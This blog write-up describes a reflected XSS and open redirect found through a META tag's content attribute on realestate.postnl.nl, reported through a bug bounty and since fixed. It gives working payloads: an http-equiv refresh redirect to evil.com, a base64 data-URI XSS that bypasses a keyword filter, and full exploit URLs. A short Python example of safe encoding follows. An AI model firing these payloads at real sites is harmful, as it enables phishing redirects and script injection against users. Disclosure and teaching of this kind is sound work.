XSS bypass using META tag in realestate.postnl.nl

Prial Islam Khan
Nov 18, 2018 · 3 min read

Hi readers,

Today I will write about an XSS vulnerability I reported to the postnl.nl bug bounty program.

Vulnerable endpoint: http://realestate.postnl.nl/?Lang=

To test for a normal reflected XSS I input "><xsstest> in the Lang parameter, and in the source it was reflected unmodified inside a META tag, like below:

<meta name="language" content=""><xsstest>" />

Looks simple, right? Then wait a little :'). Next I input "><img src=x> and I got:

[screenshot of the response to the img payload]

I tried many HTML tags and concluded two things:

  • No valid HTML tag is allowed.
  • I can create any attribute here.

So I googled meta tag attributes and got:

looks interesting 🤔🤔🤔

The http-equiv attribute caught my attention. I googled some more about it and learned that:

The META tag has the http-equiv directive. This directive allows you to define the equivalent of an HTTP header in the HTML code. The http-equiv directive can take a value of refresh, which can be used to redirect a user to another page.

Then I input 0;http://evil.com"HTTP-EQUIV="refresh" and the response was:

<meta name="language" content="0;http://evil.com"HTTP-EQUIV="refresh"" />

And I got redirected to evil.com, so I had an open redirect. Next we can try for a data URI XSS. So I input 0;javascript:alert(1)"HTTP-EQUIV="refresh" and the response was:

This was again blocked because of the keyword javascript in the payload. So I used a Base64-encoded payload: 0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh" and the response source was:

<meta name="language" content="0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"" />

And now when I visit http://realestate.postnl.nl/?Lang=0%3Bdata%3Atext%2fhtml%3Bbase64%2CPHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg%3D%3D%22HTTP-EQUIV%3D%22refresh%22 I get the XSS popup.

I reported it through their Zerocopter report form. They then deployed a fix by blacklisting the data:text/html;base64 keyword, just as they had blacklisted the javascript keyword, but I could still do an open redirect when a user visits: http://realestate.postnl.nl/?Lang=0%3Bhttp%3A%2f%2fevil.com%22HTTP-EQUIV%3D%22refresh%22

Looks cool 🙄🙄🙄
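To show why the keyword blacklist above still left the open redirect while attribute encoding closes both issues, here is an added example (my own code, not PostNL's): a minimal model of three ways the server could render the Lang value into the META tag, plus a check that parses the result the way a browser would and reports whether the untrusted value escaped the content attribute. The two insecure renderers and their fallback value are assumptions about the server, not taken from the page.

```python
import html
from html.parser import HTMLParser

# Hypothetical model of the original behaviour: raw interpolation into the attribute.
def render_meta_vulnerable(lang: str) -> str:
    return f'<meta name="language" content="{lang}" />'

# Hypothetical model of the first fix: reject known-bad keywords, otherwise interpolate raw.
BLACKLIST = ("javascript", "data:text/html;base64")

def render_meta_blacklist(lang: str) -> str:
    if any(word in lang.lower() for word in BLACKLIST):
        return '<meta name="language" content="" />'   # assumed fallback on a blocked value
    return render_meta_vulnerable(lang)

# The proper fix: HTML-attribute-encode the value. quote=True turns " into &quot;,
# so the value can never close the content attribute or start a new one.
def render_meta_encoded(lang: str) -> str:
    return f'<meta name="language" content="{html.escape(lang, quote=True)}" />'

class _TagCollector(HTMLParser):
    """Records every start tag and its attribute names, as a browser's parser would see them."""
    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, list[str]]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, [name for name, _ in attrs]))

def injected_into_markup(rendered: str) -> bool:
    """True if the rendered HTML contains anything beyond one <meta name content> tag,
    i.e. the untrusted value introduced an extra attribute (http-equiv) or a new tag."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    for tag, names in parser.tags:
        if tag != "meta" or set(names) - {"name", "content"}:
            return True
    return False

if __name__ == "__main__":
    # Constructed inputs mirroring the write-up's payloads.
    redirect = '0;http://evil.com"HTTP-EQUIV="refresh"'
    probe = '"><xsstest>'
    for name, render in (("vulnerable", render_meta_vulnerable),
                         ("blacklist", render_meta_blacklist),
                         ("encoded", render_meta_encoded)):
        print(f"{name:10} redirect={injected_into_markup(render(redirect))} "
              f"probe={injected_into_markup(render(probe))}")
```

Only the encoded renderer reports False for both inputs; the blacklist version stops the base64 payload yet still lets the refresh-based redirect through, which is exactly what the second report found.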

They fixed the issue again, listed my name on their Hall of Fame page, and also offered to send some goodies 😍😍😍.


Thanks for reading.

Follow me on twitter

If you have any questions, ask me on Facebook

Written by Prial Islam Khan

A teenage boy with a passion for Breaking Security.

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew
